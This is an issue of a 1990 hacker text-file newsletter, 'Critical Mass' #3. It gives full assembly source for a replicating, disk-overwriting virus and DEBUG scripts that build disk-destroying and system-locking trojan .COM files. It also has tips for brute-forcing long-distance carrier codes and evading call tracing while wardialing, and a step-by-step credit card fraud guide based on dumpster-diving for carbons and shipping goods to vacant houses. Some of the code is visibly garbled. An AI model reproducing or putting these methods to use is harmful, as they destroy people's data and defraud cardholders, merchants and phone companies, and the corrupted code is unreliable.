Copy Link
Add to Bookmark
Report
Critical Mass 3
_____________________________________________________________________________
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
\ Critical Issue # 03 A Technical Text /
\ Mass ~~~~~~~~~~~ File Newsletter. /
\________________________________|____________________________________/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__________________________
__________ l___________ | ___________l
// \ _______ _____ l|l _____ ______ ___
// /~~~~~~~\_\ l \ l l l|l l l // \ _ l l
// / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l
<<<< ritical l / l l l|l l l // / / \ l l
\\ \ l < l l l|l l l <<<< / ___ \ l l
\\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____
\__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l
==--> ==-->
____ __ ____ ==--> (12/29/90)
l \ / l ass ==-->
l \ / l __ ______ ______
l \ / l / \ / \ / \ A Technical
l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter
l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~
l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 3
l l l l /_/ \_\ /~~~~ / /~~~~ /
~~~~ ~~~~ ~~~~~~ ~~~~~~
_____________________________________________________________________________
l Writters l Special thanks to.... l
l__________________________l________________________________________________l
l l l
l The Beaver l Abigal, Shadow, The Nut-Kracker, Pink Floyd l
l Zap l Zap, Robo, and many others! l
l__________________________l________________________________________________l
* Note: We, the writters and editors, of this text newsletter are not
respossible for any injuries or prosocutions due to the information
giving in this text.
EXPERIMENT AT YOUR OWN RISK!
Anybody who is willing, can submit an article! If you wish to
submit an article, please e-mail either 'The Beaver' or the 'Nut-
Kracker', via the 'Warriers Retreat' (904)422-3606. Also, All
sysops can freely download this text in the terms that it is not
altered and none of the credits are change. So.................
please act like a human! Also, for your convience,
every now and then a 'volume' of the Critical Mass is
created. That is, after three to five issues (roughly 50k to 70k
of text) a compiled text will be made containing the past issues,
so if you have missed any issues,you can download the volume you need.
In order for this text to keep on being produced, you the reader
needs to submit, either it be by asking questions (Which will
sometime be included in the text) or by submitting and article.
Any articles on Hacking, Fone Phreaking, Credit Card Surfing,
Pirating, Chemistry, etc. our welcome. Any general 'not accepted'
material is accepted here! Artcles can be on anything from 'how
to rip off this type of coke machine' to 'how to build a Axis bomb
from spare car parts'. We hope you enjoy the information given and
find some use for it.
/\
/\/\ Chief Editor Brought To You By
/\/\/\ ~~~~~~~~~~~~~ Members of
/\/\/\/\ The Beaver (SC/HA)
/\/\/\/\/\
/\/\/\/\/\/\
/\/Critical\/\
\/\/\Mass/\/\/ (SC/HA)
\/\/\/\/\/\/
\/\/\/\/\/
\/\/\/\/
\/\/\/
\/\/
\/
______________________________________________________________________________
l This issue contains articles of the following..... l
l____________________________________________________________________________l
l l
l I. Editorial written by 'The Beaver'. l
l II. Part III of Hacking DECservers (Last One!) by 'The Beaver' l
l III IBM Destruction! Part III by 'The Beaver' l
l IV. Credit Card Fraud part I Written By The Beaver l
l V. Quick COM Trojan Referance, by 'Zap' l
l____________________________________________________________________________l
______________________________________________________________________________
l Todays Topic Is....... l
l Written By The Beaver l
l____________________________________________________________________________l
Oh, the things to talk about and the things to hack. There are so
many, yet so little time. The things this text could bring up. The potental.
I love it. Here's something intresting, I here that a few hackers in the
Atlanta area just got the 'IBM Home Destruction Kit v1.4', and there enjoying
it very much. This is good, and be watching out for version 2.0. As you read
this, the 'SC/HA Hacker ToolBox v3.0', should be out. Get it today. Lately,
my big thing has been LD carriers. What great little toys the fone company
offers hackers. Tonight, I was just reading the this Anarchist newletter
(I got it off of The Reactor BBS (904)878-1736), or ATI_#50, in which they
where talking about LD carriers. After reading the artical, which did have
very good info, they went into talking about using other peoples accounts
on these and how you could get caught. I like the articles they write, but yet
I beg to differ. Considering most carriers are wats lines, that blows that
theroy to hell if you ask me. Still if you get the chance, do get it. Also
get ANY newsletters from.........
TAPP
2600
These are top of the line hack stuff here. To get more info on them,
download ATI_#50. Any rate, I've been hack'in on these lately, cause I've
been feeling a little unsure about a system and about hacking it direct, so
instead of finding a in/out modem that will support it, I'm using LD carriers.
If you ask me they are easy to hack and VERY useful. They tell you the majority
of the time when you enter a wrong account, and sence your using a touch tone
fone, you only have 0-9 to worry about, plus the uses of the # and * key. For
more info just download ATI_#50. Anyrate, here are a few LD carriers........
(800)547-1784 6 digit code
(800)882-2255 ? ????? ????
(800)437-7010 8 digit code
(800)325-1337 6 digit code
(800)327-9488 6 digit code
Hell, you can get carriers out of the fone book. You don't even need
a computer to hack'em! It can help though. This is the best way to hack them
by computer that I know of. Set you system up to try codes then a fone number
you know that has a carrier. If the code is invalid, your NOT going to get a
carrier right? If it is, you got a account! The SC/HA ToolBox Hacker will
do this for you, so give it a shot!
Also, I've been hacking on a 'Centel Packet', any information that
you know about these network systems, please e-mail me at 'Warriers Retreat'.
(904)422-3606 or 'The Reactor BBS'(904)878-1736.
As I sit here at my terminal, I'm listing to U.S forces fight a
'war' as of this date. In case your wondering I'm refering to the Kuwait
'leberation'. Now I know what your thinking, what does this have to do with
hacking. While listing to the radio, I decided to do a wargame in the 224 area
prefix, when my wargame dialer was interrupted by the fone ringing. I picked
up to have a lady ask if I had just called her house. I said 'Ya, I sure did,
you see I was using my computer to call a friend and I dialed the wrong number
, sorry'. She stated that 'Oh, its alright, but its rude to hang up on people
like that, tell them you got the worng number.'. I said 'sorry, bye'. As you
may know, the Centel offers call tracing. Its neat for them, but not for us
hackers. When wargaming, you can usually get away wih what I just did with
some old lady. This gave me a few tips that I thought I would pass on to less
experiance hackers.
1. Dial about 100 to 200 Max. Never more. The fone company starts to think
after a while, but you have nothing to worry about as long as you stay in
that range. 40 to 60 numbers max on WATS lines. The fone company will
really start to think if you dial 1000 WATS lines. Think about it.
2. Keep you wargaming to a minimum. Im bad about this rule.
3. When caught by someone like above, don't worry, just play it off. If you
do your wargaming at night, you stand less of a chance that call tracing
will be used. People are tired. Also it cost four bucks per trace.
4. Once you have a list of good systems you would like to hack, keep it at
that. Also, find other people that wargame and exchange numbers. This
cuts back on wargaming and keeps you both in good shape.
Remember these rules!
Computer hackers are a dying breed in our area, so if you truely hack,
be proud but careful.
---==<Beaver>==---
P.S. - Heres a funny note. A friend of mine left his wardialer running with
no end to dialing and dialed over 2000 numbers. His line was cut and
he had to call the operator and get it turned back on. Its not really
against the law to wargame, but in a way it is considered harrassment
, so in a way it is. I won't mention how it was, but it was funny.
P.S.S- In this issue, there WAS going to be a artical on cracking commie
software by the Shadow, but SOMEBODY got to involved in another project
and hasn't finnished it yet. Look for it in CM#4
________________________________________
l l
l Hacking DECservers l
l Part III l
l Last Part! l
l l
l The Beaver l
l______________________________________l
Ok guys, here it is, the finnal part to hacking DEC servers! This is
the last of the info about them, except maybe for a little tidbits of info
here and there. First off, It would be wise to read parts I, II, and III.
Those are in issues CM#1, CM#2, and of course this one. Lets kill the small
talk and get on with it!
Ok, we all know how to broadcast messages from port to port right? Well I
hope so, anyway, I bet that you thought that broadcast was a pretty secure
method of sending messages, that is that another port won't recieve messages
that you send to a different port. Well, don't think this, they CAN be recieved
so be careful. Heres how YOU can intercept messages on a privleged account.
First, set up a service. Fake that is. So type the following........
set service (service name)
This will create a service, but in its current state, you can't connect to
it. So we must enable the service for all or certain ports, like thus.....
set service (service name) port (port number)
Now you can connect to it. You may want to make a identifier like thus......
set service (service name) ident "(identifier here)"
This makes it look nice and neat. Now if you connect to this service you
will note that nothing happens, BUT if someone sends a message, you will
recieve it, because as far as we can figure, your looking into message buffer.
You will get none of the 'From port' such and such, but just the message. No
matter where it comes from. Pretty neat huh?
As for the decoy Idea, we have yet to find a reliable way to set one up. When
we figure out how the maintenance password system works we can probably use a
compiler or interpreter to create one. Till then....... Well, it looks like
part III is a little short so sorry, but all the info you got in the past
parts should be more than enough to keep you very busy.
Before we end, I would like to thank a few DECserver hackers who helped with
hacking and ideas about this type of system......... Namely............
Shadow, The Nut-Kracker, Abigal, Gator off of UFnet, Mentalist, and many others.
Chow..............
---==<Beaver>==---
___________________________________
l l
l IBM Destruction l
l Part III l
l l
l The Beaver l
l_________________________________l
Well, here's part III!!!!!! So far we have talked about the following.......
Trojans.....
-------------
Destroying disks on all drives, including drive C:
Creating Fales Keyboard Errors
Creating Faler Disk Errors
Simulating System Crashes
Creating Trojans in TXT files by remapping key thur the ANSI driver
Etc, Etc
Viruses.....
-------------
Creating a EXE to COM infector logical virus in basic.
Creating a EXE to EXE infector logical virus in basic.
Creating a Batch file virus
Etc, Etc
Now the trojan section goes pretty deep, but the virus section is
still shallow. So this is a 500 byte code of a overwritting TRUE virus. It
comes with remarks, but they can be taken out. Thats all there will be for
part III, cause the code is VERY long........
page 70,120
Name Virus
;***************************************************************************
; Program Virus Ver: 1.1
; Copyright by R. Burger 1986
; This is a demostration program for computer
; viruses. It has the ability to replicate itself,
; and thereby modify other programs
;***************************************************************************
Code Segment
Assume CS:Code
progr equ 100h
ORG progr
;***************************************************************************
; The three NOP's serve as a marker byte of the
; virus which allow it ot identify a virus
;***************************************************************************
MAIN:
nop
nop
nop
;***************************************************************************
; Initialize the pointers
;***************************************************************************
mov ax,00
mov es:[pointer],ax
mov es:[counter],ax
mov es:[disk],al
;***************************************************************************
; Get the selected drive
;***************************************************************************
mov ah, 19h ;drive?
int 21h
;***************************************************************************
; Get selected path on the current drive
;***************************************************************************
mov cs:drive,al ; save drive
mov ah,47h ; dir?
mov dh,0
add al,1
mov dl,al ; in actual drive
lea si,cs:old_path
int 21h
;***************************************************************************
; Getting the number of drive present
; If only one drive is present, the pointer for
; search order will be set to search order +6
;***************************************************************************
mov ah, 0eh ; how many drives
mov dl,0 ;
int 21h
mov al,01
cmp al,01 ;one drive?
jnz hups3
mov al,06
hups3: mov ah,0
lea bx,search_order
add bx, ax
add bx, 0001h
mov cs:pointer,bx
clc
;***************************************************************************
; Carry is set, if no more .COM's are found.
; Then, to avoid unnessar work, .EXE files will
; be renamed to .COM files and infected.
; This causes the error message "Program too large
; to fit in memory" when starting larger infected
; EXE files
;***************************************************************************
change_disk:
jnc no_name_change
mov ah,17h
lea dx,cs:maske_exe
int 21h
cmp al, offh
jnz no_name_change ; .EXE found?
;***************************************************************************
; If neither .COM nor .EXE is found, then sectors will
; be overwritten depending on the system time in
; millisecounds. This is the time of the complete
; "infection" of a storage medium. The virus can find
; nothing more to infect and starts its destruction.
;***************************************************************************
mov ah, 2ch ; read system clock
int 21h
mov bx,cs:pointer
mov al,cs:[bx]
mov bx,dx
mov cx,2
mov dh,0
int 26h ; write crap on disk
;***************************************************************************
; Check if the end of the search order table has been
; reached. If so, end
;***************************************************************************
no_name_change
mov bx,cs:pointer
dec bx
mov cs:pointer,bx
mov dl,cs:[bx]
cmp dl,0ffh
jnz hups2
jmp hops
;***************************************************************************
; Get new drive from the search order table and
; select it.
;***************************************************************************
hups:
mov ah,0eh
int 21h ; change disk
;***************************************************************************
; Start in the root directory
;***************************************************************************
mov ah,3bh ; change path
lea dx,path
int 21h
jmp find_first_file
;**************************************************************************
; Starting from the root, search for the first subdir
; first convert all .EXE files to .COM in old
; directory.
;**************************************************************************
find_first_subdir:
mov ah,17h ; change exe to com
lea dx,cs:maske_exe
int 21h
mov ah,3bh ; use root dir
lea dx,path
int 21h
mov ah,04eh ; Search for first subdirectory
mov cx,000100001b ; dir mask
lea dx,maske_dir ;
int 21h ;
jc change_disk
moc bx,CS:pointer
INC BX
DEC bx
jz use_next_subdir
;**************************************************************************
; Select found directory
;**************************************************************************
use_next_subdir:
mov ah,2fh ; get dta address
int 21h
add bx, 1ch
mov es:[bx],'\ ' ; address of name in dta
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3bh ; change path
int 21h
pop ds
mov bx,cs:counter
inc bx
mov CS:counter,bx
;**************************************************************************
; Find first .COM file in the current directory.
; If there are none, search the next directory
;**************************************************************************
find_first_file:
mov ah,04ef ; Search for first
mov cx,00000001b ; mask
lea dx,maske_com ;
int 21h
jc find_first_subdir
jmp check_if_ill
;*************************************************************************
; If the program is already infected, search for
; the next program.
;*************************************************************************
find_next_file
mov ah,4fh ; search for next
int 21h
jc find_first_subdir
;*************************************************************************
; Check if already infected by the virus.
;*************************************************************************
check_if_ill;
mov ah,3dh ; open channel
mov al,02h ; read/write
mov dx,9eh ; address of name in dta
int 21h
mov bx,ax ; save channel
mov ah,3fh ; write in buffer
mov cx,buflen ;
mov dx,buffer ; write in buffer
int 21h
mov ah,3eh ; close file
int 21h
;*************************************************************************
; Here we search for three NOP's.
; If present, there is already an infection. We must
; then continue the search.
;*************************************************************************
mov bx,cs:[buffer]
cmp bx,9090h
jz find_next_file
;*************************************************************************
; Bypass MS-DOS write protection if present
;*************************************************************************
mov ah,43h ; write enabled
mov al,0
mov dx,9eh ; address of name in dta
int 21h
mov ah,43h
mov al,01h
and cx,11111110b
int 21h
;*************************************************************************
; Open for read/write access
;*************************************************************************
mov ah,3dh ; open channel
mov al,02h ; read/write
mov dx,9eh ; address of the name in dta
int 21h
;************************************************************************
; Read date entry of program and save for future use.
;************************************************************************
mov bx,ax ; channel
mov ah,57h ; get date
mov al,0
int 21h
;************************************************************************
; The jump located at address 0100h of the program
; will be saved for future use.
;************************************************************************
mov dx,cs:[conta] ; save old jmp
mov cs:[jmpbuf],dx
mov dx,cs:[buffer+1] ; save new jmp
lea cx,cont-100h
sub dx,cx
mov cs:[conta],dx
;*************************************************************************
; The virus copies itself to the start of the file.
;*************************************************************************
mov ah,40h ; write virus
mov cx,buflen ; length of buffer
mov dx,main ; write virus
int 21h
;*************************************************************************
; Enter old creaion date of file.
;*************************************************************************
mov ah,57h ; write date
mov al,1
pop dx
pop cx ; restore date
int 21h
;************************************************************************
; Close the file.
;************************************************************************
mov ah,3eh ; close file
int 21h
;************************************************************************
; Restore the old jump address.
; The virus saves at address "conta" the jump which
; was at the start of the host program.
; This is done to preserve the execubility of the
; host program as much as possible.
; After saving it still works with the jump address
; contained in the virus. The jump address in the
; virus differs from the jump address in memory
;
;************************************************************************
mov dx,cs:[jmpbuf] ; restore old jmp
mov cs:[conta],dx
hops: nop
call_use_old
;************************************************************************
; Continue with the host program
;************************************************************************
cont db 0e9h
conta dw 0
mov ah,00
int 21h
;************************************************************************
; Reactivate the selected drive at the start of the
; program.
;************************************************************************
use_old:
mov ah,0eh ; use old drive
mov dl,cs:drive
int 21h
;************************************************************************
; Reactivate the selected path at start of the
; program.
;************************************************************************
mov ah,3bh ; use old dir
lea dx,old_path-1;get old path and backslash
int 21h
ret
search_order db 0ffh,1,0,2,3,0ffh,00,0ffh
pointer dw 0000 ; pointer f. search order
counter dw 0000 ; counter f. nth. search
disks db 0 ; number of disks
maske_com db "*.com",00 ; search for com files
maske_dir db "*",00 ; search for dir's
mask_exe db 0ffh,0,0,0,0,0,00111111b
db 0,"???????exe",0,0,0,0
db 0,"???????com",0
db 0ffh,0,0,0,0,0,00111111b
db 0,"????????????",0,0,0,0
db 0,"?????????com",0
buffer equ 0e000h ; a safe place
buflen equ 230h ; length of virus !!!!!!!
; careful
; if changing !!!!!!!
jmpbuf equ buffer+buflen ; a safe place for jmp
path db "\",0 ; first path
drive db 0 ; actual drive
back_slash db "\"
old_path db 32 dup(?) ; old path
code ends
end main
This virus must be running one DOS 2.11 or higher. the virus can be
made shorted by removing all remarks, extra segment calls.humps, etc. It was
written by the world known virus expert R.Burger, in 1986. Have fun!
---==<Beaver>==---
_____________________________________
l l
l Credit Card Fraud l
l Part I l
l The Beaver l
l___________________________________l
I'm not very into this type of stuff, or at least for the last few
years, but it is amazing how easy credit card fraud is. For about 3 to 4
years, I did do the following that I am about to mention and was never caught.
I must warn you the read that never the less this is a very risky game.
Actually, it is far from a game, but is actually very easy to get away with.
If you must use the information given, please make it something worth while.
Don't use credit card fraud for a neat game you saw in 'Compute' magazine,
but rather something you need. I must also note that when you do this, 90%
of the time, the guy or girl you ripped off never has to pay for the goods
you got but rather the card company that you used. Here we go............
To preform credit card fraud you need no computer, just a few
magazines and a card number. Here is the way we use to run things when I
did it step by step.
All you need is a credit card number, experation date, and the
name of the credit card holder. In case your wondering where this information
can be found, its all around you every day. If you have a very photographic
memory, you can obtain all you need at a store, but like most, you probably
can't memorize 16 to 13 digits, the card holders name, and the experation
date. In this case, you can usually goto a store that is closed and dig though
the trash late at night. In the trash you should find 'carbons', or the
transfering screen. These are black and when pressed upon tranfer all charaters
to another piece of paper. For example, if you take a carbon and put it over
a piece of paper and write your name on the carbon, it will also be written
on the piece of paper as well as the carbon. In this case it goes paper-carbon
-paper, so that a copy goes to the customer and a compy to the store and the
carbon is thrown away. When you dig through the trash, you find the carbons and
when held backwards in the light, you can see all the information you need to
preform credit card fraud. On the carbon, as said before, you will see a 16
to 13 digit number. This is there credit card number. If it is not 13 to 16
digits, something is wrong, so don't use it. Here are the two most popular
formats.
4XXX-XXXX-XXXX-XXXX
5XXX-XXXX-XXXX-XXXX
Theses are you basic 16 digit formats. The 'X's signify other numbers.
Whats so important about the '4' and '5' are that they tell what type of card
they are. For instance, a credit card that start with '4' is a VISA card, and
a credit card that starts with '5' is a MASTERCARD. All cards run by this
format. For example, I think cards that start with '3' are DISCOVER cards, but
at this point, because its been so long, I can't remember. But that is what
tells each card apart. Remember this, this is important information. Just
remember, you must AT LEAST have the card holders name, experation date and
card number. Sometimes you need this and there address and phone number, but
sometimes you can get by without them. Try to get all the information you can
get on them, the more you have the more it helps.
The next step we took was simply looking in magazines and finding
things we wanted and needed. We would write down the price and the phone
numbers. We DID NOT CALL THEM THEN, but later. Just keep reading you'll see
why.
After this, we found a empty house that was for sale and we knew
would be open for at least a week. We would look in the 'home buyers guide'
and check out houses. When we found one, we would copy the address and the
next phase would take place.
This phase consisted of calling the places that we wanted to order
stuff from and ordering UPS. Early on in our credit card scams, we tried
sending it US mail, but you will never get it. The reason it works with UPS
is because they leave it on the door step if it is pre-paid for, which in this
case it is. NOTE: When the orders where placed, we would send the stuff too
the house for sale (we nobdy lived), this is where the trick and the risk
comes in.
In about a week, the stuff we ordered would show up at the door
step of the house we order it from. We would check at the house three days
after we had order them ever day. The risk is when you pick up the goods.
Actually, at the worst, the card holder can only find out a week after it
happened, because the billing lags behind the order, so actually the risk is
slim, but there is still a risk. We would simply go there at night, scope out
the area and grab the stuff. As I said, the risk is not very much, but in
my opinion, there is still a risk involved, bu thtat is only in the pick up.
TIPS: When you order the goods, all you should be asked is what you want,
the card type (note the top and see way thats important!), experation
date, you name (the card holders name OF COURSE!), and the address
(the empty house). When the mail order house asks your social security
numbers and other stange questions, something fucked up. You don't have
the correct information. Just simply hang up, also ONLY DO YOU ORDERING
ON WATS LINE. They can't (or at least have to have tons of time to trace
, about 5 to 8 hours to be exact) trace, where if you order in you area
it takes about millisecound.
What you just read is the bare basics of credit card fraud. Its that
easy! Thats why I don't have or want a credit card, even though they are
becoming a standard.
Part II will cover the use of merchant numbers and some other advanced
methods of credit card fraud. Chow!
---==<Beaver>==---
The Trojan and Virus Quick Reference Guide
Information by: The Beaver
Written By: Zap
From Critical Mass Issue #1
--------------------------------------------------------------------------------
Trap Disk Access
a100
mov ah, 35
mov al, 4
int 21
mov ax, es
mov dx, bx
mov ds, ax
mov ah, 25
mov al, 13
int 21
mov ax, 0
int 21
<--- This Space must be here!
r cx
15
n (Enter a name you want the compiled file to be).COM
w
q
--------------------------------------------------------------------------------
Fake System Crash
a100
mov ah, 35
mov al, 4
int 21
mov ax, es
mov dx, bx
mov ds, ax
mov ah, 25
mov al, 9
int 21
mov ax, 0
int 21
<--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q
-------------------------------------------------------------------------------
Trap the Key Board
a100
mov ah, 35
mov al, 4
int 21
mov ax, es
mov dx, bx
mov ds, ax
mov ah, 25
mov al, 13
int 21
mov ax, 0
int 21
<--- This Space must be here!
r cx
15
n (The name you want the compiled file to be).COM
w
q
--------------------------------------------------------------------------------
Destroy Disk A:
a100
mov ah, 5
mov dl,0 0
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
<--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q
--------------------------------------------------------------------------------
Destroy Disk B:
a100
mov ah, 5
mov dl,0 1
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
<--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q
Destroy Disk C:
a100
mov ah, 5
mov dl,0 2
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
<--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q
--------------------------------------------------------------------------------
Destroy Disk D:
a100
mov ah, 5
mov dl,0 3
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
<--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q
--------------------------------------------------------------------------------
Destroy Disk E:
a100
mov ah, 5
mov dl,0 4
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
<--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q
Lock up Drive A:
a100
mov ah, 35
mov dl, 0
mov dh, 0
mov ch, 80
mov cl, 1
mov ah, 8
int 13
mov ah, 0
int 21
<--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q
--------------------------------------------------------------------------------
Lock up Drive B:
a100
mov ah, 35
mov dl, 1
mov dh, 0
mov ch, 80
mov cl, 1
mov ah, 8
int 13
mov ah, 0
int 21
<--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q
--------------------------------------------------------------------------------
Triple Program Load Time
a100
mov ax, 0
mov ds, ax
mov bx, 522
mov ah, ff
mov (bx), ah
xor ax,ax
int 13
mov,00
int 21
<--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q
NOTE: MAKE THESE INTO ASCII FILES
AND THEN FROM A DOS PROMPT
TYPE THE FOLLOWING...
DEBUG < (The name of the file)
I.E. if this was an ASCII file called
DISKACC.TXT I would type the
following:
DEBUG <DISKACC.TXT
DECServer and EMULEX server
Quick Referance
-------------------------------------------------------------------------------
All of the following commands can be used directly on DEC200, DEC300
DECServer's in general, and EMULEX machines. This is you quick reference guide
to them!
Command Short Hand Comment
------- ---------- ---------------------------------------------
Show Users sh u Shows all users online
Show Port sh por Shows you port
Show Port (#) sh por (#) Shows a specific port number
Broadcast bro por (#) Sends a message to a specific port
Show Server sho server Displays info on the server
Show Node Sho no Displays info on nodes
Connect C Connects to a server or node.
Set server pas Set server pass Set server password (priv only)
Set inactivity set inact Set inactivity to enabled or disabled(e/d)(priv
only)
logout lo logouts your port
logout port(#) lo por (#) logouts a specific port # (priv only)
zero ze Zeros server counters
Set node set nod Sets a node e/d (priv only)
Clear Clea Kills a service or node (priv only)
Purge Purg Kills a service or node (priv only) from dbase
Show Counters sh count displays server counters
Set service set servi creates a service
For more info, type help at the 'local' prompts of these types of
servers!
---==<Beaver>==---
_____________________________
l l
l Letters And Replies l
l___________________________l
As before, here are some letters recieved and here are some replies.
If you have a question, E-mail me at 'The Reactor BBS' (904)878-1736 or
'Warriers Retreat BBS' (904)422-3606. Also, all letters are annonymous unless
you state other wise!
From: XXXXXXXXXXX Read: 25 times [1 Reply]
Subject: Beaver
Hello Monsieur Beaver,
I have some suggestions for CM. Give more details when describing how to do
stuff. Some of your info was excellent, but at times it was not enough. Is
there a number where I can reach you voice?
Ok, your right, sometimes the information does go a little far and not
that well explained, but when Im writting, I tend to think that the reader
is a hacker and already knows alot of the stuff, so I get carried away,
assuming that everybody understands the things I leave out. If you have any
questions, drop me a line. Im sorry but I don't give out my fone number to
strangers.
Sorry! Chow!........
---==<Beaver>==---
By:XXXXXXXXXXXXXXX
Beaver,
What new features will the 'IBM Destruction Kit v2.0' have that
version 1.4 doesn't have?
After writting version 1.4, I relized the versitity as a 'kit' was
very little, sence it only created just the file you asked for. So all you
could create was a 'drive C destroyer' and not a 'keyboard traping, drive A,
B, and C destroyer' in one shot. With version 2.0, you can do this. Also,
the files where in assembly and adveraged about 20 bytes. Thats pretty short
to be a 'neat game', or what not, so I added in the options of putting in
nop's to waste space to make the file appear longer. Actually, the first part
of the program are all that counts though. I also added a few other features
I think you guys will like. You can get it from 'The Reactor BBS' under the
name 'grind2.zip' when it comes out!
From: XXXXXXXXXXX
Hello once again,
I understand about the phone number (not giving it out). The only problem
is, I don't feel comfortable asking you questions about FIRN on this or any
other BBS. I don't want people complaining about me on this board. I would
like to keep a good status with the users and the sysop so I can keep up the
message reading and file getting. Know what I mean? I have been trying to
get a priv account on so many things on FIRN, but I can't get one. I have
been trying every night for the past week (since I read your article).
I have no problem getting on to FIRN and connecting to FAU Ethernet and then
connecting to a service. The only problems I have arise when username and
password prompts arise. I am an 18 year old FSU computer science major.
I wish we had different ways to communicate (non-BBS)
I can be contacted most every night on 'call 202' off of UFnet. If you
can 'hold you horses' I can almost always be reached there, anlong with a
few other hacker friends of mine. Just do the following.
Call FIRN (488-0650)
Press 'A'
Type 'UFNET'
At the '#' prompt type 'call 202'
Then type 'sho u' (shows users currently online)
If im on you will see the name 'beaver' and to the left of that the port number
To send me a message type: bro por (#) "Msg. here"
E.G
bro por 7 "hello beaver how are you"
Also, I have found when using terminals like 'pc-talk' I can't use 200
either. the only thing I can suggest is to use a ANSI comp. terminal or a
vt52 or vt100 terminal.
---==<Beaver>==---
_________________________________
l l
l Finnal Notes l
l_______________________________l
Well, once again we come to the end of another issue of Critical
Mass. Here is what you can probably (I stress probably) expect in the next
issue.
Hacking UNIX/SUN's and VAX's
Kracking Commie Software
The IBM Home Destruction part V
And MUCH more, but you'll just have to wait and see. Also, a
software update. The 'IBM Home Destruction Kit' is being merged with the
'The SC/HA Hacker Toolbox'. So there will be no version 2.0 of the 'IBM
Home Destruction Kit'. Heres what 'The SC/HA Hacker ToolBox V3.1' will
have........
Online and Offline Trojan Kit with....
Drive A,B,C,D kills
Simulated Errors
ANSI Remapping
Simulated Crashes
Multiple task trojan creator
Much MORE!
File Tranfer's in.....
XModem
Ymodem
ASC Buffering
LD Carrier code finer
Dbase hacker with.....
470+ popular passwords
A 'Fall in' term for those nets
And about a ton more! Like Terminal Emulations, and other things!
ALSO: I had tons of question about hacking DECservers so I and
a few other people are going to put together a text file explaining every
detail on the basics of DECservers along with hacking them. I have no idea
when it will be out though........
Shadow has been working on a simular kit for the Amiga and I here
that another friend of mine is thinking about writting a simular term for the
c64. We'll see. Any rate, happy hack'en and stay away from those modem
police!
Thanx To: Pink Floyd (for that UNIX info), Shadow, Abigail, Robo
for forwarding mail, My dad again for ideas, and
many others
No Thanx Too: The usual assholes, you know how you are!
---==<Beaver>==---
I